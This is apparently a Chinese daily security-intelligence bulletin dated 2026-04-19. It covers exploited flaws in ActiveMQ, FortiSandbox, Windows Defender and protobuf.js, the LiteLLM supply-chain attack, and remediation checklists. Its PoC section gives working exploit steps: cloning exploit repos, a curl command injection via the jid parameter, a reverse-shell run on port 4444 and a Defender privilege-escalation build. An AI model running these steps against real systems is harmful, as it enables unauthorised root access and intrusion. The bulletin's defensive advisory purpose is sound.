每日安全情报报告 · 2026-04-19

每日安全情报报告 · 2026-04-19发布时间2026-04-19 |风险等级 高危 |情报来源The Hacker News、FreeBuf、安全客、CISA KEV、NVD、GitHub一、高危漏洞速报 CVE-2026-34197 — Apache ActiveMQ Jolokia 远程代码执行在野利用 ⚠️字段详情漏洞类型远程代码执行RCE/ 代码注入受影响组件Apache ActiveMQ Classic 5.19.46.0.0 ~ 6.2.3CVSS 评分8.8高危利用状态在野积极利用已入 CISA KEV2026-04-18 新增披露日期2026-04-07漏洞描述ActiveMQ 通过 Jolokia JMX-HTTP 桥接暴露了 Broker MBean 上的exec操作攻击者可利用此接口远程调用任意 Java 方法执行系统命令。该漏洞潜伏时间长达13 年影响大量未升级的企业消息队列基础设施。部分版本配置下甚至无需认证。CISA 于 2026-04-18 将其正式收录 KEV 目录要求联邦机构在截止日期前完成修补。参考链接- NVD 漏洞详情- CISA KEV 目录- The Hacker News 报道- FreeBuf 分析- 阿里云漏洞库修复建议立即升级至 Apache ActiveMQ Classic5.19.4或6.2.4对 Jolokia 端点实施访问控制禁止外网直接访问。 CVE-2026-39808 — Fortinet FortiSandbox 未授权命令注入 RCEPoC 已公开字段详情漏洞类型OS 命令注入未经身份验证受影响组件Fortinet FortiSandbox 4.4.0 ~ 4.4.8CVSS 评分9.1严重利用状态PoC 已公开发布GitHub攻击尝试激增披露日期2026-04-15漏洞描述FortiSandbox/fortisandbox/job-detail/tracer-behavior端点未对jidGET 参数进行充分过滤攻击者可通过管道符|注入任意 OS 命令以 root 权限执行无需任何认证凭据。PoC 代码已由安全研究员 Samuel de Lucas 公开至 GitHub利用难度极低一条curl命令即可完成攻击。参考链接- GitHub PoCsamu-delucas/CVE-2026-39808- Cyber Press 分析报告- 新加坡 CSA 安全公告- 比利时 CCB 公告修复建议立即升级至 FortiSandbox4.4.8 以上修复版本监控/fortisandbox/job-detail/tracer-behavior端点的异常 GET 请求限制管理接口的外网访问。 CVE-2026-39813 — Fortinet FortiSandbox 未授权认证绕过字段详情漏洞类型认证绕过受影响组件Fortinet FortiSandbox 4.4.0 ~ 4.4.8CVSS 评分9.8严重利用状态漏洞已公开存在主动利用风险披露日期2026-04-15漏洞描述攻击者可通过向 FortiSandbox JRPC API 发送精心构造的 HTTP 请求绕过身份认证机制完全接管受影响设备。与 CVE-2026-39808 组合利用可实现完整的未授权 RCE 攻击链危险性极高。参考链接- OpenCVE 漏洞详情 CVE-2026-39813- 新加坡 CSA 安全公告- Undercode Testing 技术分析 CVE-2026-33825 — Windows Defender BlueHammer 本地权限提升在野利用 ⚠️字段详情漏洞类型本地权限提升LPETOCTOU 竞争条件受影响组件Microsoft Defender AntivirusWindows 10/11/Server 2016-2025CVSS 评分7.8高危利用状态在野利用确认CISA KEV 收录已修复4月Patch Tuesday披露日期2026-04-15漏洞描述Defender 威胁修复引擎在处理检测到的恶意文件时存在 TOCTOU检查-使用时间差竞争条件漏洞。攻击者可通过 NTFS 连接点重定向写入路径诱使 Defender 以 SYSTEM 权限覆盖任意系统文件从而实现本地权限提升。与RedSun云文件回滚路径验证绕过及UnDefendDefender 更新机制破坏组合利用可形成完整的防御瓦解 提权攻击链。RedSun 和 UnDefend 目前仍未修复。参考链接- Picus Security 技术分析- The Hacker News 报道- FreeBuf泄露的 Windows Defender 0Day 正遭活跃利用- SOCRadar 分析修复建议立即应用微软 4 月 Patch Tuesday 安全更新已修复 BlueHammer/CVE-2026-33825RedSun 和 UnDefend 暂无补丁建议临时限制低权限用户对 Defender 功能的访问部署 EDR 行为监控。 protobuf.js — 缓冲区溢出 RCEPoC 已公开暂无官方补丁字段详情漏洞类型缓冲区溢出 / 远程代码执行受影响组件Google protobuf.js 6.8.0 ~ 7.2.6CVSS 评分严重具体评分待 CVE 正式分配利用状态PoC 已公开官方补丁暂未发布披露日期2026-04-18漏洞描述攻击者通过构造恶意 Protocol Buffer 消息利用protobuf.js解析过程中的输入验证缺陷触发缓冲区溢出可执行任意 JavaScript 代码无需身份认证。任何接受并处理 Protocol Buffer 消息的应用端点REST API、WebSocket 等均面临威胁影响 Node.js 和浏览器端大量应用。参考链接- Anavem 漏洞分析报告- npm protobufjs 官方包修复建议暂无官方补丁建议临时对处理 Protobuf 消息的接口实施严格输入验证和大小限制使用npm audit确认依赖版本关注官方 GitHub 补丁发布动态。二、漏洞 PoC 速递1. CVE-2026-34197 — Apache ActiveMQ Jolokia RCE漏洞简述利用 Jolokia JMX 接口暴露的exec操作执行任意系统命令。使用步骤# Step 1克隆 PoC 仓库 git clone https://github.com/dinosn/CVE-2026-34197.git cd CVE-2026-34197 # Step 2安装依赖 pip install requests # Step 3运行 PoC需要目标 ActiveMQ 的 Jolokia 端点可访问 # 默认端口 8161Web Console或 8080Jolokia HTTP Bridge python3 exploit.py -t http://TARGET_IP:8161 -c id # Step 4验证结果成功则返回 uid0(root) 等信息注意需要目标 ActiveMQ 启用了 Jolokia 接口默认配置中已启用部分旧版本无需认证即可利用。PoC 来源- GitHub - dinosn/CVE-2026-34197- Vulhub 环境复现2. CVE-2026-39808 — Fortinet FortiSandbox 未授权命令注入漏洞简述通过jid参数管道符注入以 root 身份执行任意 OS 命令。使用步骤# Step 1克隆 PoC 仓库 git clone https://github.com/samu-delucas/CVE-2026-39808.git cd CVE-2026-39808 # Step 2安装依赖仅需 curl 或 Python requests pip install requests # Step 3手动验证无需运行脚本单条 curl 即可 # 将命令输出写入 Web 根目录 curl http://TARGET_IP/fortisandbox/job-detail/tracer-behavior?jid1|id/var/www/html/output.txt # Step 4读取命令执行结果 curl http://TARGET_IP/output.txt # 预期输出uid0(root) gid0(root) groups0(root) # Step 5运行完整 PoC 脚本获取反弹 Shell python3 exploit.py --target http://TARGET_IP --lhost YOUR_IP --lport 4444PoC 来源- GitHub - samu-delucas/CVE-2026-398083. CVE-2026-33825 (BlueHammer) — Windows Defender TOCTOU 提权漏洞简述利用 Defender 文件修复引擎的 TOCTOU 竞争条件通过 NTFS 连接点将 SYSTEM 写操作重定向至任意文件路径。使用步骤# PoC 仓库公开 git clone https://github.com/Nightmare-Eclipse/RedSun.git cd RedSun # Step 1编译 PoC需要 Visual Studio / MinGW # Windows PowerShell 环境执行 msbuild BlueHammer.sln /p:ConfigurationRelease # Step 2运行提权 PoC需要低权限用户执行 .\BlueHammer.exe # Step 3验证权限提升 whoami # 预期输出nt authority\system注意此利用需要本地代码执行权限主要用于从受限用户账户提升至 SYSTEM。PoC 来源- BlackSwan 威胁公告- BleepingComputer 验证报道三、网络安全最新动态1. 微软 Defender 三重零日BlueHammer、RedSun、UnDefend 联合在野利用Huntress 安全团队 2026-04-18 发布紧急预警披露三个针对 Windows Defender 的零日漏洞自 4 月 10 日起已被攻击者积极利用。其中CVE-2026-33825BlueHammer已通过 4 月 Patch Tuesday 修复但RedSun和UnDefend仍处于未修复状态数亿 Windows 系统面临持续风险。三个漏洞可组合形成削弱防御 持久提权的完整攻击链在渗透测试中已获 SYSTEM 权限验证。阅读 The Hacker News 报道 | 阅读 FreeBuf 分析2. Apache ActiveMQ 13 年老漏洞 CVE-2026-34197 加入 CISA KEV在野攻击激增CISA 于 2026-04-18 将 CVE-2026-34197 正式纳入已知利用漏洞KEV目录。该漏洞源于 ActiveMQ Jolokia JMX 接口设计缺陷潜伏 13 年后终于被大规模利用。目前 GitHub 已有公开 PoC攻击者正针对暴露在公网的 ActiveMQ 实例发动攻击。企业应立即排查并升级受影响版本。阅读 The Hacker News 报道 | 查看 CISA KEV 详情 | Aviatrix 技术分析3. FortiSandbox 双重严重漏洞 PoC 公开攻击态势骤然升级Fortinet 于 2026-04-15 发布安全公告披露 FortiSandbox 两个严重级别漏洞CVE-2026-39808 CVSS 9.1 CVE-2026-39813 CVSS 9.8。公告发布后仅 2 天CVE-2026-39808 的 PoC 即被公开至 GitHub漏洞利用门槛极低。新加坡 CSA、比利时 CCB 等多国安全机构已相继发布紧急预警要求使用 FortiSandbox 的组织立即升级。阅读 vpncentral 分析 | 查看 GitHub PoC4. protobuf.js 零日 RCEPoC 公开、官方补丁悬空Node.js 生态拉响警报2026-04-18Google 广泛使用的 JavaScript Protocol Buffers 库protobuf.js版本 6.8.0 ~ 7.2.6被曝严重 RCE 漏洞PoC 已公开。官方截至报告发布时尚未发布补丁数以万计的 Node.js 应用面临无补丁窗口期风险。建议所有使用protobuf.js的项目立即进行依赖自查并实施临时缓解措施。阅读 Anavem 漏洞报告5. LiteLLM 供应链投毒腾讯朱雀实验室完整溯源TeamPCP 窃取 PyPI 发布权限腾讯朱雀实验室发布完整溯源报告揭示 3 月 LiteLLM 供应链攻击版本 1.82.7 和 1.82.8的完整攻击链攻击组织TeamPCP先通过 Trivy 扫描器窃取 PyPI 发布凭证随后将恶意代码嵌入.pth文件Python 启动时自动执行实现对 SSH 密钥、云端凭证及所有 LLM API Key 的静默窃取。LiteLLM 月下载量近 1 亿次此次攻击被认为是 2026 年最严重的 AI 供应链攻击事件之一。阅读腾讯云开发者报告 | GitHub 完整分析 | dev.to 技术复盘6. 执法行动Interpol-related 行动打掉 PowerOFF DDoS 平台查封 53 个域名国际执法部门联合行动成功捣毁PowerOFFDDoS 租用攻击平台查封53 个恶意域名涉及75,000 名注册用户和300 万个犯罪账户。该平台长期向黑市提供低成本 DDoS 攻击服务被多个勒索软件组织用于勒索辅助打击。此次行动是 2026 年迄今规模最大的 DDoS 生态系统打击行动。查看 2026-04-18 每日安全资讯7. 2026 年第 3 周网络安全周报AI 助力漏洞挖掘供应链继续失守本周4月13-17日主要安全态势微软 4 月补丁日创历史第二大规模163 个 CVE其中 2 个零日已在野利用供应链攻击持续泛滥LiteLLM、Axios、Apifox 等The Gentlemen 勒索软件单周发动 68 起攻击成为本周最活跃威胁组织AI 安全军备竞赛加速Claude Mythos 等模型展现出大规模漏洞挖掘能力安全行业对 AI 双刃剑风险的讨论愈发激烈。阅读 2026 年第 3 周安全周报四、本期重点摘要风险等级漏洞/事件关键点严重CVE-2026-34197 Apache ActiveMQ13年老洞、在野利用、CISA KEV 新增严重CVE-2026-39808/39813 FortiSandbox双重严重、PoC 公开、认证绕过RCE高危CVE-2026-33825 Windows DefenderBlueHammer 在野利用RedSun/UnDefend 未修复高危protobuf.js RCEPoC 公开、无官方补丁、影响 Node.js 生态中危LiteLLM 供应链攻击溯源TeamPCP 全链路披露AI 供应链信任危机信息PowerOFF DDoS 平台被打掉53 域名、7.5 万用户、300 万犯罪账户五、今日行动清单P0 优先Apache ActiveMQ立即检查版本升级至 5.19.4 / 6.2.4对 Jolokia 端点设置访问控制列表Fortinet FortiSandbox立即升级至 4.4.8 修复版本监控tracer-behavior端点访问日志Windows Defender确认 4 月 Patch Tuesday 补丁已部署BlueHammer/CVE-2026-33825关注 RedSun/UnDefend 补丁发布protobuf.js运行npm audit检查是否使用 6.8.0 ~ 7.2.6 版本对 Protobuf 输入接口实施严格校验LiteLLM确认项目未使用 1.82.7 / 1.82.8 版本检查环境变量和 SSH 密钥是否泄露本报告综合自 The Hacker News、FreeBuf、CISA KEV、NVD、GitHub、技术栈周报等权威来源仅供安全防御研究参考请勿用于非法用途。